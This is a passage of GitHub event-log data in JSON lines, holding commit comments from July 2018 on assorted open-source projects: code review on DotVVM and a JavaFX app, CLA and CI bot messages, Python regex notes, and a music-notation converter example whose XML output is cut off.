{"id":"7998439959","type":"CommitCommentEvent","actor":{"login":"srichmond3000"},"repo":{"name":"srichmond3000/udemy-react-native-course"},"payload":{"comment":{"id":29788209,"position":null,"line":null,"path":null,"commit_id":"63d78554d8ae6265eb3e5d59e5f3eeef7de059db","created_at":"2018-07-21T11:03:39Z","updated_at":"2018-07-21T11:03:39Z","author_association":"OWNER","body":"Basic working app ready to run."}},"created_at":"2018-07-21T11:03:39Z"}
{"id":"7998440877","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone-react"},"payload":{"comment":{"id":29788211,"position":null,"line":null,"path":null,"commit_id":"7f060b2d0a03e0ff520f107fb087855d9d380f26","created_at":"2018-07-21T11:04:23Z","updated_at":"2018-07-21T11:04:23Z","author_association":"NONE","body":"Victor Fernandez de Alba, Rob Gietema your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-21T11:04:23Z"}
{"id":"7998441121","type":"CommitCommentEvent","actor":{"login":"abhinayagarwal"},"repo":{"name":"devoxx/MyDevoxxGluon"},"payload":{"comment":{"id":29788212,"position":34,"line":124,"path":"DevoxxClientMobile/src/main/java/com/devoxx/views/cell/ScheduleCell.java","commit_id":"963a0c3d7c610092365c14caa606af471e503b05","created_at":"2018-07-21T11:04:38Z","updated_at":"2018-07-21T11:04:38Z","author_association":"COLLABORATOR","body":"Theoretically, it should have the same impact since both of these scenario's will call `layoutChildren()` on the parent. "}},"created_at":"2018-07-21T11:04:38Z"}
{"id":"7998441608","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone-react"},"payload":{"comment":{"id":29788214,"position":null,"line":null,"path":null,"commit_id":"cca5199f6f44e70c4ebd019e34c05cdb4b7484cc","created_at":"2018-07-21T11:05:06Z","updated_at":"2018-07-21T11:05:06Z","author_association":"NONE","body":"Victor Fernandez de Alba, Rob Gietema your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-21T11:05:06Z"}
{"id":"7998443196","type":"CommitCommentEvent","actor":{"login":"AtaMuhiuldin"},"repo":{"name":"AtaMuhiuldin/NODE"},"payload":{"comment":{"id":29788218,"position":null,"line":null,"path":null,"commit_id":"a97b9290589bc086997fa007f101e9fa1d4b8fd5","created_at":"2018-07-21T11:06:29Z","updated_at":"2018-07-21T11:06:29Z","author_association":"OWNER","body":"Good Work"}},"created_at":"2018-07-21T11:06:29Z"}
{"id":"7998443466","type":"CommitCommentEvent","actor":{"login":"tomasherceg"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29788222,"position":null,"line":null,"path":null,"commit_id":"3036726a9783bb953ddf1b7b9a62f2c27d0db7b3","created_at":"2018-07-21T11:06:45Z","updated_at":"2018-07-21T11:06:45Z","author_association":"CONTRIBUTOR","body":"This is not a workaround, this is a feature similar to ViewModelLoader we already have. I don't see a problem in having this API - it won't be used on ASP.NET Core, but it makes sense on OWIN and it can also help when you integrate DotVVM in existing apps and you already use some container. Having this extensibility point can be useful, even for tracing or diagnostics purposes. \r\nAnd we may get rid of it when we introduce a proper way of using IServiceProvider on OWIN, which is not that easy.\r\n\r\nI was thinking about the name - the alternatives were IServiceLoader (which is too generic) or maybe IBindingServiceLoader (but it may be confusing). If you have other ideas, I am open to renaming that.\r\n\r\nThe term \"static command service\" is not used in the code, but we use it everywhere in the documentation and it is the official name of the feature. I know that you can use the services in other types of bindings, but in 99% cases, they will be used in static commands - that's why we made them. "}},"created_at":"2018-07-21T11:06:45Z"}
{"id":"7998444044","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-cooccur-feedstock"},"payload":{"comment":{"id":29788224,"position":null,"line":null,"path":null,"commit_id":"0d04de071348a354a4369646e52b60e444398d77","created_at":"2018-07-21T11:07:16Z","updated_at":"2018-07-21T11:07:16Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nick-youngblut was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-21T11:07:16Z"}
{"id":"7998445317","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone-react"},"payload":{"comment":{"id":29788225,"position":null,"line":null,"path":null,"commit_id":"55e8157322c3ee44f1dfb96bec53563afcf6b2bd","created_at":"2018-07-21T11:08:30Z","updated_at":"2018-07-21T11:08:30Z","author_association":"NONE","body":"Victor Fernandez de Alba, Rob Gietema your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-21T11:08:30Z"}
{"id":"7998446364","type":"CommitCommentEvent","actor":{"login":"shun-ogawa"},"repo":{"name":"shun-ogawa/git-app"},"payload":{"comment":{"id":29788226,"position":1,"line":1,"path":"app/assets/javascripts/articles.coffee","commit_id":"adbeed9d905910fc22cc5d142d1e7176cede3ff2","created_at":"2018-07-21T11:09:32Z","updated_at":"2018-07-21T11:09:32Z","author_association":"OWNER","body":"不要なコメントは消してしまいましょう"}},"created_at":"2018-07-21T11:09:32Z"}
{"id":"7998447060","type":"CommitCommentEvent","actor":{"login":"jperedadnr"},"repo":{"name":"devoxx/MyDevoxxGluon"},"payload":{"comment":{"id":29788227,"position":15,"line":104,"path":"DevoxxClientMobile/src/main/java/com/devoxx/views/cell/ScheduleCell.java","commit_id":"963a0c3d7c610092365c14caa606af471e503b05","created_at":"2018-07-21T11:10:12Z","updated_at":"2018-07-21T11:10:12Z","author_association":"COLLABORATOR","body":"I was thinking you could do something like this:\r\n```\r\nborderPane = new BorderPane(listTile);\r\n        if (showSessionType) {\r\n            labelType = new Label();\r\n            sessionType = new HBox(labelType);\r\n            sessionType.getStyleClass().add(\"session-type\");\r\n            sessionType.managedProperty().bind(sessionType.visibleProperty());\r\n            borderPane.setTop(sessionType);\r\n        }\r\n```\r\nso later on inside the `updateItem` method:\r\n\r\n```\r\nif (showSessionType) {\r\n            if (session.isShowSessionType()) {\r\n                labelType.setText(session.getTalk().getTalkType());\r\n                sessionType.setVisible(true); // or add top node\r\n            } else {\r\n                sessionType.setVisible(false); // or remove top node\r\n            }\r\n        }\r\n```\r\n"}},"created_at":"2018-07-21T11:10:12Z"}
{"id":"7998447079","type":"CommitCommentEvent","actor":{"login":"shun-ogawa"},"repo":{"name":"shun-ogawa/git-app"},"payload":{"comment":{"id":29788228,"position":null,"line":null,"path":null,"commit_id":"adbeed9d905910fc22cc5d142d1e7176cede3ff2","created_at":"2018-07-21T11:10:13Z","updated_at":"2018-07-21T11:10:13Z","author_association":"OWNER","body":"不要なファイル、コメントがあればけしてしまいましょう。"}},"created_at":"2018-07-21T11:10:13Z"}
{"id":"7998447578","type":"CommitCommentEvent","actor":{"login":"tomasherceg"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29788230,"position":null,"line":null,"path":null,"commit_id":"46f043d28f5bda2f83f2bf827c65a2c32d56e252","created_at":"2018-07-21T11:10:39Z","updated_at":"2018-07-21T11:10:39Z","author_association":"CONTRIBUTOR","body":"OWIN is still used by most of DotVVM users and we are not going to deprecate it soon. \r\nAnd I am happy to introduce public API for current DotVVM users if it makes their lives easier."}},"created_at":"2018-07-21T11:10:39Z"}
{"id":"7998452202","type":"CommitCommentEvent","actor":{"login":"exyi"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29788236,"position":null,"line":null,"path":null,"commit_id":"3036726a9783bb953ddf1b7b9a62f2c27d0db7b3","created_at":"2018-07-21T11:15:06Z","updated_at":"2018-07-21T11:15:06Z","author_association":"CONTRIBUTOR","body":"> This is not a workaround, this is a feature similar to ViewModelLoader we already have.\r\n\r\nThis is not true, `ViewModelLoader` (and similar ones) gives you power to initialize the view model in any way you want, not only by calling constructor. Your loader does not give you anything.\r\n\r\n> but it makes sense on OWIN and it can also help when you integrate DotVVM in existing apps and you already use some container.\r\n\r\nIt really surprised me that it's not possible to replace the IServiceProvider on OWIN, in principle it should be trivial as we use the standard ASP.NET Core DI.\r\n\r\n> I was thinking about the name\r\n\r\nIt should be called `IServiceProvider`. (...and you don't have to implement it)\r\n\r\n> The term \"static command service\" is not used in the code, but we use it everywhere in the documentation and it is the official name of the feature.\r\n\r\nThat's not very awesome when it's not a static command service...\r\n\r\n> but in 99% cases, they will be used in static commands - that's why we made them.\r\n\r\nI hope this is not true."}},"created_at":"2018-07-21T11:15:06Z"}
{"id":"7998458023","type":"CommitCommentEvent","actor":{"login":"shun-ogawa"},"repo":{"name":"shun-ogawa/git-app"},"payload":{"comment":{"id":29788246,"position":1,"line":1,"path":"app/assets/javascripts/articles.coffee","commit_id":"adbeed9d905910fc22cc5d142d1e7176cede3ff2","created_at":"2018-07-21T11:20:21Z","updated_at":"2018-07-21T11:20:21Z","author_association":"OWNER","body":"消しました！"}},"created_at":"2018-07-21T11:20:21Z"}
{"id":"7998459419","type":"CommitCommentEvent","actor":{"login":"LeonieOx"},"repo":{"name":"LeonieOx/Propaedeutikum2018"},"payload":{"comment":{"id":29788250,"position":null,"line":null,"path":null,"commit_id":"91f03213ffb33661fadb395d753a28588fdd7126","created_at":"2018-07-21T11:21:41Z","updated_at":"2018-07-21T11:21:41Z","author_association":"OWNER","body":"Erster Test!"}},"created_at":"2018-07-21T11:21:41Z"}
{"id":"7998468762","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29788267,"position":null,"line":null,"path":null,"commit_id":"136cbcb07fc8cd3f87777fee69987e7c51489621","created_at":"2018-07-21T11:30:06Z","updated_at":"2018-07-21T11:30:06Z","author_association":"OWNER","body":"### Note:\r\n```\r\n#Downtiser\r\nimport re\r\n#非负整数\r\nres = re.search('0|(?<!(-|\\d))([1-9][0-9]*)','a-15ff-1b12c')\r\nprint(res)\r\n#正整数\r\nres = re.search('(?<!(-|\\d))[1-9][0-9]*','a-15b0ff53d')\r\nprint(res)\r\n#非正 整数\r\nres = re.search('0|(-[1-9][0-9]*)','a3-15ff-1b12c')\r\nprint(res)\r\n#负整数\r\nres = re.search('-[1-9][0-9]*','a0-13ff-1b12c')\r\nprint(res)\r\n#整数\r\nres = re.search('0|(-?[1-9]\\d+)','a50-13ff-1b12c')\r\nprint(res)\r\n#非负浮点数\r\nres = re.search('(?<!-|\\d)(0(?!\\d)|[1-9]\\d*)(\\.\\d+)?','a-5230.00b30.125')\r\nprint(res)\r\n#非负浮点数，取指定位数\r\nres = re.search('(?<!-|\\d)(0(?!\\d)|[1-9]\\d*)(\\.\\d{0,3})?','a-5230.00b3.1254')\r\nprint(res)\r\n#正浮点数\r\nres = re.search('(?<!-|\\d)([1-9]\\d*)(\\.\\d+)?','a-5230.00b0.00c3.1254')\r\nprint(res)\r\n#非正 浮点数\r\nres = re.search('0(?!\\d)(\\.0+)?|-(0(?!\\d)|[1-9]\\d*)(\\.\\d+)?','a-0.3215v0.00b0.00c3.1254')\r\nprint(res)\r\n#负浮点数\r\nres = re.search('-(0(?!\\d)|[1-9]\\d*)(\\.\\d+)?','a0.00c-0.3215v0.00b0.00c3.1254')\r\nprint(res)\r\n#浮点数\r\nres = re.search('-?((0(?!\\d)|[1-9]\\d+)(\\.\\d+))','a00-20.345')\r\nprint(res)\r\n```"}},"created_at":"2018-07-21T11:30:06Z"}
{"id":"7998469564","type":"CommitCommentEvent","actor":{"login":"ensonic"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29788270,"position":63,"line":94,"path":"OpenRobertaParent/OpenRobertaDesktopApp/src/main/java/de/fhg/iais/DesktopApp.java","commit_id":"38fbb117b40004d867af683a3b628356173ce908","created_at":"2018-07-21T11:30:42Z","updated_at":"2018-07-21T11:30:42Z","author_association":"NONE","body":"updateFile() is not a good name. You want to explain that this is a workaround for now being able to pass the flag to the front-end by other means. This is not a good solution, because the modified code for the fron-end will get a 404 (file-not found) in the normal server case and it is also an additional http request."}},"created_at":"2018-07-21T11:30:42Z"}
{"id":"7998472993","type":"CommitCommentEvent","actor":{"login":"FabianHertwig"},"repo":{"name":"FabianHertwig/CarND-Capstone"},"payload":{"comment":{"id":29788277,"position":5,"line":73,"path":"ros/src/waypoint_updater/waypoint_updater.py","commit_id":"da7e2bd47cb04916323d228dead7f2108cf9ce3e","created_at":"2018-07-21T11:34:03Z","updated_at":"2018-07-21T11:34:03Z","author_association":"OWNER","body":"I think this is not necessary as  `self.publish_waypoints()` is called in the loop function."}},"created_at":"2018-07-21T11:34:03Z"}
{"id":"7998473850","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"double-beep/Stockfish"},"payload":{"comment":{"id":29788280,"position":null,"line":null,"path":null,"commit_id":"613dbbafa1481b6409b46ffd1f3a1ef0ea286f11","created_at":"2018-07-21T11:34:50Z","updated_at":"2018-07-21T11:34:50Z","author_association":"NONE","body":"You will not learn anything with only 2000 games, the error bars are too large.\r\n\r\nPlease stop this test.\r\nYou should use the default \"Stop rule\" SPRT\r\nand the \"SPRT bounds\" [0, 4] (Parameter Tweak)  for this.\r\n\r\nSee https://github.com/glinscott/fishtest/wiki for general instructions"}},"created_at":"2018-07-21T11:34:50Z"}
{"id":"7998474319","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29788284,"position":null,"line":null,"path":null,"commit_id":"01a9c193fc6a8357d1aedcccac292280d941ce09","created_at":"2018-07-21T11:35:16Z","updated_at":"2018-07-21T11:35:16Z","author_association":"MEMBER","body":"Of course not. see the second commit?"}},"created_at":"2018-07-21T11:35:16Z"}
{"id":"7998475087","type":"CommitCommentEvent","actor":{"login":"Marginal"},"repo":{"name":"Marginal/docker-get_iplayer"},"payload":{"comment":{"id":29788286,"position":6,"line":6,"path":"pvr","commit_id":"5a73d171034849c65c48565e636973bea633c5a9","created_at":"2018-07-21T11:35:59Z","updated_at":"2018-07-21T11:35:59Z","author_association":"OWNER","body":"OK will remove, thanks."}},"created_at":"2018-07-21T11:35:59Z"}
{"id":"7998476911","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29788287,"position":null,"line":null,"path":null,"commit_id":"184a1842c4eb9f348605a8cfabcf757b70b6e95e","created_at":"2018-07-21T11:37:40Z","updated_at":"2018-07-21T11:37:40Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-5](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-5).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-5-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-21T11:37:40Z"}
{"id":"7998480434","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29788295,"position":null,"line":null,"path":null,"commit_id":"156303c7fb3883be9e961afcfe219fec7c4710b6","created_at":"2018-07-21T11:40:58Z","updated_at":"2018-07-21T11:40:58Z","author_association":"OWNER","body":"Is it better to initialize $playerX, $player0, $map inside the Game instead of pass them as arguments to Game's constructor? But then I must pass configuration for them ..."}},"created_at":"2018-07-21T11:40:58Z"}
{"id":"7998481028","type":"CommitCommentEvent","actor":{"login":"s-ayush"},"repo":{"name":"NISER-Software-Development-Group/proto-website-01"},"payload":{"comment":{"id":29788296,"position":null,"line":null,"path":null,"commit_id":"4860ac3db28a15eea25d6f1a5cbdd10c182724ef","created_at":"2018-07-21T11:41:30Z","updated_at":"2018-07-21T11:41:30Z","author_association":"COLLABORATOR","body":"Sweet!"}},"created_at":"2018-07-21T11:41:30Z"}
{"id":"7998484781","type":"CommitCommentEvent","actor":{"login":"dusanvel"},"repo":{"name":"davidbujic/Kalendar"},"payload":{"comment":{"id":29788300,"position":null,"line":null,"path":null,"commit_id":"bbfb92a41c830fb354b92860c2da7c056ccaa48f","created_at":"2018-07-21T11:44:56Z","updated_at":"2018-07-21T11:44:56Z","author_association":"NONE","body":"> > **Davide**, odlično urađeno.  Izgleda da smo se razumeli. Postavi još neki projekat ovakvog tipa i vežbaj korišćenje markdown ka na primer `mentions`  @davidbujic "}},"created_at":"2018-07-21T11:44:56Z"}
{"id":"7998484976","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29788302,"position":null,"line":null,"path":null,"commit_id":"c813d5695bbf5f89ccf1e6b5d579ba84c55d1f32","created_at":"2018-07-21T11:45:06Z","updated_at":"2018-07-21T11:45:06Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-7](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-7).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-7-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-21T11:45:06Z"}
{"id":"7998485965","type":"CommitCommentEvent","actor":{"login":"fredvd"},"repo":{"name":"plone/plone.app.mosaic"},"payload":{"comment":{"id":29788308,"position":null,"line":null,"path":null,"commit_id":"7d6038ee3e80405f92d516394dc2d199d64ca6cb","created_at":"2018-07-21T11:45:57Z","updated_at":"2018-07-21T11:45:57Z","author_association":"MEMBER","body":"@petschki The problem with the ecosystem pins in versions.cfg is that creating a pull request on coredev doesn't test anything, they're not used/pulled in. \r\n\r\nThe only other package I'm aware of that was using plone.app.drafts was collective.cover but only because plone.app.drafts was a dependency in I think plone.app.tiles, but that was fixed 1-2 years ago. \r\nAh.....plone.app.tiles still has plone.app.drafts as a test requirement, but that is tested in plone.app.mosaic itself.\r\n\r\nThe ecosystem pins in coredev are only a convenience for the 'almost in core, widely used but still separate' add'ons so that newbies don't run into issues. \r\n\r\nAs plone.app.mosaic is the only major consumer of plone.app.tiles/blocks/drafts I'm aware of, it might make sense to put a note in the versions.cfg here to keep it in sync with the ecosystem KGS pins of coredev. "}},"created_at":"2018-07-21T11:45:57Z"}
{"id":"7998487930","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29788312,"position":37,"line":54,"path":"tests/TicTacToeTest.php","commit_id":"156303c7fb3883be9e961afcfe219fec7c4710b6","created_at":"2018-07-21T11:47:45Z","updated_at":"2018-07-21T11:47:45Z","author_association":"OWNER","body":"I thought by this TDD Top to Bottom approach, this function should lead to thinking about methods for moves. I mean I start by imagining an interface to the Game with essentials, and then thinking about more details to sustain that interface. "}},"created_at":"2018-07-21T11:47:45Z"}
{"id":"7998489070","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29788316,"position":null,"line":null,"path":null,"commit_id":"a73b1b780b57b2e3b0a08af4c33720ceaa5a68cd","created_at":"2018-07-21T11:48:42Z","updated_at":"2018-07-21T11:48:42Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-9](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-9).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-9-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-21T11:48:42Z"}
{"id":"7998490538","type":"CommitCommentEvent","actor":{"login":"andrewbird"},"repo":{"name":"stsp/fdpp"},"payload":{"comment":{"id":29788320,"position":null,"line":null,"path":null,"commit_id":"958a7ef8c686c4f2d0181bf3303af247895d7cd0","created_at":"2018-07-21T11:50:08Z","updated_at":"2018-07-21T11:50:08Z","author_association":"NONE","body":"I guess I should have said I was working on `_vsnprintf()`, but no matter :-)"}},"created_at":"2018-07-21T11:50:08Z"}
{"id":"7998491402","type":"CommitCommentEvent","actor":{"login":"tomasherceg"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29788322,"position":null,"line":null,"path":null,"commit_id":"3036726a9783bb953ddf1b7b9a62f2c27d0db7b3","created_at":"2018-07-21T11:50:50Z","updated_at":"2018-07-21T11:50:50Z","author_association":"CONTRIBUTOR","body":"OWIN itself doesn't have IServiceProvider at all. The only method where you can register services in a service collection is when you call UseDotVVM, and there is no way to supply your own IServiceProvider like in ASP.NET Core - you can only register things in IServiceCollection which is not suitable for open generic registrations and so on. \r\n\r\nSince IServiceProvider name is already taken, I'll keep the name IStaticCommandServiceLoader. \r\n\r\nAnd I have created issue #628 to solve this properly when there is time for that."}},"created_at":"2018-07-21T11:50:50Z"}
{"id":"7998494019","type":"CommitCommentEvent","actor":{"login":"christiansandberg"},"repo":{"name":"hardbyte/python-can"},"payload":{"comment":{"id":29788328,"position":5,"line":28,"path":"doc/interfaces.rst","commit_id":"6735a0ea753b70c19cf098fbb131daffcb1258df","created_at":"2018-07-21T11:53:08Z","updated_at":"2018-07-21T11:53:08Z","author_association":"COLLABORATOR","body":"It’s in ‘can/interfaces/__init__.py’. We can deprecate the old one as long as we follow [semantic versioning](https://semver.org/)."}},"created_at":"2018-07-21T11:53:08Z"}
{"id":"7998496348","type":"CommitCommentEvent","actor":{"login":"berserkyo"},"repo":{"name":"berserkyo/handymenubot"},"payload":{"comment":{"id":29788332,"position":3,"line":3,"path":"crawling_down.sh","commit_id":"e5eadc5770139d1788b893b8831aac547df49df0","created_at":"2018-07-21T11:55:22Z","updated_at":"2018-07-21T11:55:22Z","author_association":"OWNER","body":"실행파일명 변경함으로 인해, 삭제"}},"created_at":"2018-07-21T11:55:22Z"}
{"id":"7998496556","type":"CommitCommentEvent","actor":{"login":"shevyallan"},"repo":{"name":"Microsoft/vscode-chrome-debug"},"payload":{"comment":{"id":29788333,"position":null,"line":null,"path":null,"commit_id":"83decfcffa519f57e5baef85cb9ba19d16259715","created_at":"2018-07-21T11:55:35Z","updated_at":"2018-07-21T11:55:35Z","author_association":"NONE","body":"A"}},"created_at":"2018-07-21T11:55:35Z"}
{"id":"7998496902","type":"CommitCommentEvent","actor":{"login":"berserkyo"},"repo":{"name":"berserkyo/handymenubot"},"payload":{"comment":{"id":29788335,"position":3,"line":3,"path":"crawling_down.sh","commit_id":"e5eadc5770139d1788b893b8831aac547df49df0","created_at":"2018-07-21T11:55:56Z","updated_at":"2018-07-21T11:55:56Z","author_association":"OWNER","body":"흠터레스팅"}},"created_at":"2018-07-21T11:55:56Z"}
{"id":"7998496986","type":"CommitCommentEvent","actor":{"login":"andrewbird"},"repo":{"name":"stsp/fdpp"},"payload":{"comment":{"id":29788336,"position":5,"line":210,"path":"kernel/prf.c","commit_id":"958a7ef8c686c4f2d0181bf3303af247895d7cd0","created_at":"2018-07-21T11:56:01Z","updated_at":"2018-07-21T11:56:01Z","author_association":"NONE","body":"is VA_CDECL correct in this instance, wasn't that for the `...` not `va_list`?"}},"created_at":"2018-07-21T11:56:01Z"}
{"id":"7998497062","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29788337,"position":null,"line":null,"path":null,"commit_id":"41df905cf710e997affef216c84e223b22ef2209","created_at":"2018-07-21T11:56:04Z","updated_at":"2018-07-21T11:56:04Z","author_association":"CONTRIBUTOR","body":"This commit allows for arbitrary printed accidentals above trill marks in the humdrum-to-MEI converter.  Typically the converter will automatically calculate the correct accidental to place above the trill mark based on the key signature and previous pitch accidental states in the measure.  There are cases where the automatically calculated accidental is not the desired one, such as for cautionary accidentals and incorrect accidentals being reflected from a source edition.\r\n\r\nExample:\r\n\r\n<img width=\"1398\" alt=\"screen shot 2018-07-21 at 1 47 52 pm\" src=\"https://user-images.githubusercontent.com/3487289/43035290-5dba4b4c-8ced-11e8-81fd-1d1f03edec1d.png\">\r\n\r\nThe second line shows how to suppress an accidental, with the second measure on the line having a minor-second trill, but no qualifying accidental above the note that would otherwise be required in a C-major key signature.\r\n\r\nHumdrum input:\r\n\r\n```\r\n**kern\r\n=\r\n1cT\r\n=\r\n!LO:TR:acc=-\r\n1ct\r\n=\r\n!LO:TR:acc=--\r\n1ct\r\n=\r\n!LO:TR:acc=#\r\n1ct\r\n=\r\n!LO:TR:acc=##\r\n1ct\r\n=\r\n!LO:TR:acc=n\r\n1ct\r\n=||\r\n1ct\r\n=\r\n!LO:TR:acc=none\r\n1ct\r\n==\r\n*-\r\n```\r\n\r\nMEI conversion:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-21T13:55:25\" version=\"2.0.0-dev-a8ecf52-dirty\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001740874025\">\r\n                <score xml:id=\"score-0000001552531447\">\r\n                    <scoreDef xml:id=\"scoredef-0000001204621242\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000001922888524\">\r\n                            <staffDef xml:id=\"staffdef-0000001204930159\" clef.shape=\"G\" clef.line=\"2\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000000182613006\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L2\">\r\n                            <staff xml:id=\"staff-L2F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L2F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L3F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L3F1\" staff=\"1\" startid=\"#note-L3F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L4\">\r\n                            <staff xml:id=\"staff-L4F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L4F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L6F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L6F1\" staff=\"1\" startid=\"#note-L6F1\" accidupper=\"f\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L7\">\r\n                            <staff xml:id=\"staff-L7F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L7F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L9F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L9F1\" staff=\"1\" startid=\"#note-L9F1\" accidupper=\"ff\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L10\">\r\n                            <staff xml:id=\"staff-L10F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L10F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L12F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L12F1\" staff=\"1\" startid=\"#note-L12F1\" accidupper=\"s\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L13\">\r\n                            <staff xml:id=\"staff-L13F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L13F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L15F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <trill xml:id=\"trill-L15F1\" staff=\"1\" startid=\"#note-L15F1\" accidupper=\"x\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L16\" right=\"dbl\">\r\n                            <staff xml:id=\"staff-L16F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L16F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L18F1\" 